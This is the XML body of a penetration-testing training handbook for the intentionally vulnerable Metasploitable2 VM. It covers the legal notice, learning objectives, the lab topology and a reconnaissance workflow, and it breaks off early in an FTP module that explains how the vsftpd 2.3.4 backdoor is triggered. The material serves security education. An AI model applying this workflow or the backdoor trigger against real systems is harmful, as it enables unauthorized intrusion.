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2E74B5"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING LAB HANDBOOK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Assessment &amp; Exploitation Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A Hands-On Guide to FTP, SSH, Telnet, HTTP, SMTP, MySQL, VNC and SMB Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="900"/>
      </w:pP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Lab Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux (Attacker) &amp; Metasploitable2 (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Framework Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit Framework, Nmap, Searchsploit, Netdiscover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Document Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Technical Training Handbook</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Audience</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Cybersecurity Students, SOC Trainees, Penetration Testing Trainees</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">For Authorized Training / Lab Use Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Prepared For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal Cybersecurity &amp; IT Education Curriculum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="700"/>
      </w:pP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DEEEE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Legal &amp; Ethical Use Notice</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">This handbook documents exploitation of Metasploitable2, an intentionally vulnerable virtual machine published by Rapid7 solely for education and authorized security training. All activity described here must be performed only inside an isolated, legally owned or explicitly authorized lab environment (e.g., a private virtual network). Using these techniques against any system without documented, prior authorization is illegal under computer misuse laws in most jurisdictions and violates professional codes of ethics (e.g., EC-Council, (ISC)², OffSec). This document is for defensive skill-building and awareness only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId7"/>
          <w:footerReference w:type="default" r:id="rId8"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1440" w:right="1350" w:bottom="1440" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2 is an intentionally vulnerable Linux virtual machine developed by Rapid7 to give students and security professionals a safe, legal environment in which to practice penetration testing and ethical hacking. The machine is deliberately loaded with outdated services, weak configurations, and known software vulnerabilities so that learners can practice the full attack lifecycle — reconnaissance, scanning, exploitation, and post-exploitation — without risking harm to production systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This handbook documents a complete lab walkthrough built around a two-machine topology: Kali Linux acts as the attacking workstation, while Metasploitable2 serves as the vulnerable target. Both machines are placed on the same isolated virtual network so that the attacker host can discover, scan, and interact with the target directly. The exercises in this handbook progress service-by-service through eight commonly exploited network services: FTP, SSH, Telnet, HTTP, SMTP, MySQL, VNC, and SMB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Learning Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand how unpatched, outdated network services create exploitable attack surfaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Practice the standard penetration-testing workflow: host discovery → port/service scanning → vulnerability identification → exploit selection → exploitation → post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gain hands-on experience with core tools: ifconfig, netdiscover, Nmap, Searchsploit, and the Metasploit Framework (msfconsole).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Learn to interpret Metasploit module options (RHOSTS, payloads, credential files) and execute exploit modules correctly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand how to stabilize a shell using a Python PTY upgrade for a fully interactive terminal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Translate each successful exploitation into concrete, real-world hardening and remediation guidance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Topology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Attacker Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux — penetration testing distribution with Metasploit, Nmap, Searchsploit pre-installed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Victim Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable2 — intentionally vulnerable Ubuntu 8.04-based Linux VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Network Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Host-only / isolated NAT network (both VMs on the same private subnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary Toolset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">ifconfig, netdiscover, nmap, searchsploit, msfconsole, mysql client, vncviewer, telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Demonstrate full compromise (root-level access) of each exploited service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard Workflow Used Across All Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the attacker's own IP address using ifconfig.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover the target's IP address on the local subnet using netdiscover.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate open ports, running services, and OS fingerprint using an Nmap service/version scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-reference the identified service version against known exploits using searchsploit and/or the Metasploit module search.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch msfconsole, select the appropriate exploit or auxiliary module, and configure required options (notably RHOSTS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute the exploit and validate that a session or credential set has been obtained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Where a raw shell is returned, upgrade it to a fully interactive TTY using a Python pty.spawn one-liner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document findings and apply the corresponding remediation guidance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each of the following modules is organized identically for consistency and ease of reference: a service overview and technical background, a reconnaissance phase, a step-by-step exploitation procedure with exact commands, applicable post-exploitation steps, a consolidated command reference table, remediation and hardening recommendations, and key learning outcomes. This structure is intended to make the handbook usable both as a one-time lab guide and as a repeatable reference during future training sessions or certification preparation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="default" r:id="rId10"/>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1: FTP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vsftpd 2.3.4 (File Transfer Protocol)</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TCP/21</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Backdoor Command Execution (vsftpd 2.3.4 malicious backdoor, distributed via compromised source archive, 2011)</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Critical — unauthenticated remote root code execution</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FTP (File Transfer Protocol) is a legacy protocol used to transfer files between a client and server, traditionally operating on port 21. Standard FTP transmits both credentials and file data in plaintext, making intercepted traffic trivially readable. On Metasploitable2, the installed vsftpd 2.3.4 package contains a well-known, intentionally-inserted backdoor that grants an unauthenticated attacker a root shell.</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In 2011 the official vsftpd-2.3.4.tar.gz source archive hosted on the project's download servers was maliciously modified. Any FTP username containing the sequence “:)” (a smiley face) triggers the backdoor, which opens a listener on TCP port 6200 and grants a root shell to anyone who connects to it — no valid credentials are required. Metasploitable2 ships this exact vulnerable build specifically to teach this class of supply-chain backdoor vulnerability.</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Identify the attacker host's own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ifconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover the target's IP address on the shared subnet using netdiscover (requires root privileges).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netdiscover -r 192.168.228.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the first two addresses returned are typically the default gateway/router; identify the Metasploitable2 host separately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run an Nmap service/version and OS-detection scan against the discovered host to enumerate all open ports.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192.168.228.130 192.168.228.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
